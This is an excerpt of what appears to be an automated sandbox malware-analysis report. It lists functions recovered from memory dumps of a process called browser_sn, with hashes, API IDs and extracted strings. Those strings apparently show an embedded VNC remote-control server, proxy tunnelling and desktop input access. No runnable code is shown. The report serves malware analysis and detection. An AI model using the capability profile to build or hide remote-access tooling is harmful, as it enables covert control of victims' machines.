                                                                            • Instruction Fuzzy Hash: 98317A31A08A8282EB509F00A8402B973B0FF4975EF540436DECDC2764DFBCE5A9C740
                                                                            Function 00007FF6C2B993E0 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 87libraryloaderCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Library$AddressCreateDeleteDisplayEnumErrorFreeLastLoadProcSettings
                                                                            • String ID: DISPLAY$EnumDisplayDevicesA$USER32$mv video hook driver2
                                                                            • API String ID: 1846935786-1174184736
                                                                            • Opcode ID: 90704b8816186510b2b91f08dfa5c235d54b69d90b2a5e6b12a0bf26ce9b4dd4
                                                                            • Instruction ID: bf161a8c40ec1c0096ca68735bd7cdf7f3edb283a64b202f3508db645db6d6cb
                                                                            • Opcode Fuzzy Hash: 90704b8816186510b2b91f08dfa5c235d54b69d90b2a5e6b12a0bf26ce9b4dd4
                                                                            • Instruction Fuzzy Hash: 49312C25A09A8285EBB0DF21B8547AA73B0FF99749F840136DE8E82795DF7CD009C700
                                                                            Function 00007FF6C2B83A90 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 98COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ImageLoadModule$BitsCreateDeleteFileHandleName
                                                                            • String ID: ($DISPLAY$\background.bmp
                                                                            • API String ID: 3125945695-1422902838
                                                                            • Opcode ID: 5c990643eb74fd538b6b4e7c95b6f894b66b7c2a1e2628e0d5a9c6046c92dc90
                                                                            • Instruction ID: e45d0d0188d7167ba1eadeea45a1506d18e0f63189f6ea6904d81ec650f34b60
                                                                            • Opcode Fuzzy Hash: 5c990643eb74fd538b6b4e7c95b6f894b66b7c2a1e2628e0d5a9c6046c92dc90
                                                                            • Instruction Fuzzy Hash: 7C413135A08B8186E760CF24F8557AA77A0FB99799F401239DEDD83BA4DF7CE0558B00
                                                                            Function 00007FF6C2B8C810 Relevance: 16.1, APIs: 4, Strings: 5, Instructions: 366networkCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: recv$send
                                                                            • String ID: CONNECT %s:%d HTTP/1.0$Location: $Proxy-Authenticate:$WWW-Authenticate:$basic
                                                                            • API String ID: 1963230611-4083095726
                                                                            • Opcode ID: d657ed37a6cae802db04decd52c8b9e56745bb5c9d23933e6423cb635756a354
                                                                            • Instruction ID: b28923d8be2a7036716506f6ac3d097822b64ba3aa83260e49c51644248911bd
                                                                            • Opcode Fuzzy Hash: d657ed37a6cae802db04decd52c8b9e56745bb5c9d23933e6423cb635756a354
                                                                            • Instruction Fuzzy Hash: 2FF190A1A0CB8741EA949F21A5402B966A1FF8679EF540532DF8DC3B95EFBCF506C700
                                                                            Function 00007FF6C2C42C70 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 159fileCOMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: File_set_error_mode$CurrentHandleModuleNameProcessWrite
                                                                            • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
                                                                            • API String ID: 2183313154-4022980321
                                                                            • Opcode ID: cf5eef92c392be2f681cf437b81623491fac9973547c1d005ab3661ee4ff1334
                                                                            • Instruction ID: caf9dfac0f5da0ef90a5d8e86bb4cefe5c072ef1af112fd0ba91d1c3a4fd9df3
                                                                            • Opcode Fuzzy Hash: cf5eef92c392be2f681cf437b81623491fac9973547c1d005ab3661ee4ff1334
                                                                            • Instruction Fuzzy Hash: 2251C325B1868241F7A4DF25A8126BB63B1BF8578AF444135EFCD83B85CFBCE506C605
                                                                            Function 00007FF6C2BD9A40 Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 68registryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: PrivateProfile$CloseFileModuleNameOpenQueryValue
                                                                            • String ID: NewMSLogon$Software\ORL\WinVNC3$UseRegistry$admin
                                                                            • API String ID: 771632046-3493897170
                                                                            • Opcode ID: 7e17a9a545862003f56dca8ab1949a50e46989200b9f0bc494998167346eab91
                                                                            • Instruction ID: ec6a3950550d732b831c4ed5f4cda8366f8d1b7c7c5d1158dd9641f4ee1c25ca
                                                                            • Opcode Fuzzy Hash: 7e17a9a545862003f56dca8ab1949a50e46989200b9f0bc494998167346eab91
                                                                            • Instruction Fuzzy Hash: B1311036A18A86C2EAA0CF20E4557AA73B0FB8574DF801135EBCD86758DFBDD109CB40
                                                                            Function 00007FF6C2C3DF80 Relevance: 15.3, APIs: 10, Instructions: 292timeCOMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: _errno$_get_daylight_invalid_parameter_noinfo$ByteCharMultiWidefree$ErrorFreeHeapInformationLastTimeZone___lc_codepage_func__wtomb_environ_amsg_exit_getptd_lock
                                                                            • String ID:
                                                                            • API String ID: 2532449802-0
                                                                            • Opcode ID: 8dacce8ed05afb912c218c2bfa4b7955afc0b41eb5700f84e9d69f6c384d718a
                                                                            • Instruction ID: 044f8bfcff3e0d63f3504d5ecd65efa6e91224e39d4def75759ac96f3ed0a66d
                                                                            • Opcode Fuzzy Hash: 8dacce8ed05afb912c218c2bfa4b7955afc0b41eb5700f84e9d69f6c384d718a
                                                                            • Instruction Fuzzy Hash: 73C1AF32A0C28285EBA49F25A4417BA77B5BF8578AF404535DFCD837A6DFBCE8118700
                                                                            Function 00007FF6C2BA6BBD Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 244COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Desktop$CloseCountCriticalInputLeaveOpenSectionTick
                                                                            • String ID: vncclient.cpp : vncClientThread $vncservice.cpp : OpenInputdesktop2 NULL$vncservice.cpp : OpenInputdesktop2 OK$vncservice.cpp : SelectDesktop
                                                                            • API String ID: 429868813-3977938048
                                                                            • Opcode ID: 1ce61eda1815472dcf5eec9035d10c7bcc81b982fce4800f6686f7fc95f08c9b
                                                                            • Instruction ID: 51da60cf9808415785081d148cce1a428d3950c032456d952c722b13280d7741
                                                                            • Opcode Fuzzy Hash: 1ce61eda1815472dcf5eec9035d10c7bcc81b982fce4800f6686f7fc95f08c9b
                                                                            • Instruction Fuzzy Hash: CAC1BE22A0869185F794CF25C4587BE7BB1EB86B8EF184031DE8C877A5CFB9D445C740
                                                                            Function 00007FF6C2B9B3D0 Relevance: 14.0, APIs: 9, Instructions: 489COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CreateRect$CombineDeleteObjectfree$malloc
                                                                            • String ID:
                                                                            • API String ID: 4067307076-0
                                                                            • Opcode ID: 20d05e3cb4de81eeb824483ab4ff36b23af894bb04d54c932c434dd6306be1f0
                                                                            • Instruction ID: e6f1f5b5f798c42016305e52801c5663dc51d07d0901646ab69f3a81abe231a3
                                                                            • Opcode Fuzzy Hash: 20d05e3cb4de81eeb824483ab4ff36b23af894bb04d54c932c434dd6306be1f0
                                                                            • Instruction Fuzzy Hash: A8228E726186818BD764CF25E4402AEBBA1F799B89F044135EE8E87B58DF7CE951CF00
                                                                            Function 00007FF6C2B974C0 Relevance: 13.6, APIs: 9, Instructions: 102keyboardCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: State$CriticalSection$EnterLeave
                                                                            • String ID:
                                                                            • API String ID: 1138030011-0
                                                                            • Opcode ID: b876853db541de4715cda3d519086bd40b26c50766e7c8197b39221afb36b709
                                                                            • Instruction ID: 5d4fffffc5babeaa6f1dd212fc48fee0cab2e045912b6fc3af49bfcdd805398b
                                                                            • Opcode Fuzzy Hash: b876853db541de4715cda3d519086bd40b26c50766e7c8197b39221afb36b709
                                                                            • Instruction Fuzzy Hash: 4C41A465A1865282F651AF21A50433A66B1FF9135FF050434EECD837A0CFBDE895E360
                                                                            Function 00007FF6C2BA51B7 Relevance: 12.6, APIs: 3, Strings: 4, Instructions: 399COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: DesktopOpen$ClipboardCloseInput
                                                                            • String ID: vncclient.cpp : vncClientThread $vncservice.cpp : OpenInputdesktop2 NULL$vncservice.cpp : OpenInputdesktop2 OK$vncservice.cpp : SelectDesktop
                                                                            • API String ID: 2872304593-3977938048
                                                                            • Opcode ID: 51bfd8cfb38b1ed9c7bc9b47d0c5e6e89efe1868c0e2a08d2aedafe3f1771537
                                                                            • Instruction ID: d24f6cd14e7b336f1b83c3f467e8e72771b80d4ff3670342b7e8c929e6d66dc9
                                                                            • Opcode Fuzzy Hash: 51bfd8cfb38b1ed9c7bc9b47d0c5e6e89efe1868c0e2a08d2aedafe3f1771537
                                                                            • Instruction Fuzzy Hash: 9012A032A086C285FBA0CF25C8587FE77A1EB86B8EF544135DE8D8B795CEA8D545C340
                                                                            Function 00007FF6C2B99260 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 83libraryloaderCOMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Version$AddressHandleInfoModuleProcSystem
                                                                            • String ID: GetNativeSystemInfo$kernel32.dll
                                                                            • API String ID: 335284197-192647395
                                                                            • Opcode ID: bd6ae27e489f82f31fcc2b20e4ae8107fd534e528a9ba4d17229ed8c41967507
                                                                            • Instruction ID: 1a0e5c41c0e2de94e89e4f3b3ae8750164c7353a9a1e7cd7afd87e537f84cc6a
                                                                            • Opcode Fuzzy Hash: bd6ae27e489f82f31fcc2b20e4ae8107fd534e528a9ba4d17229ed8c41967507
                                                                            • Instruction Fuzzy Hash: 5131D821A0CA8286EAA0EF51A4553BA73B0FB9574DF804435EACDC3B95EFADD4558B00
                                                                            Function 00007FF6C2BD78E0 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 75registryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: PrivateProfileQueryValue$FileModuleNameString
                                                                            • String ID: UseRegistry$admin$admin_auth
                                                                            • API String ID: 3374479654-3376419731
                                                                            • Opcode ID: d388acf6b38bd496d9c85bc5d0d74c3b57a82cc440bcd5f7a364d2f7207814f4
                                                                            • Instruction ID: 06fa0be96d015caeed76cc3cc03df64ede38151cacacee64c36ad86554153335
                                                                            • Opcode Fuzzy Hash: d388acf6b38bd496d9c85bc5d0d74c3b57a82cc440bcd5f7a364d2f7207814f4
                                                                            • Instruction Fuzzy Hash: 9C312136618A8291EA90CF11E8447EAB3A4FB8978AF441136EECD87B58DF7CD545CB00
                                                                            Function 00007FF6C2C37220 Relevance: 12.1, APIs: 8, Instructions: 67COMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
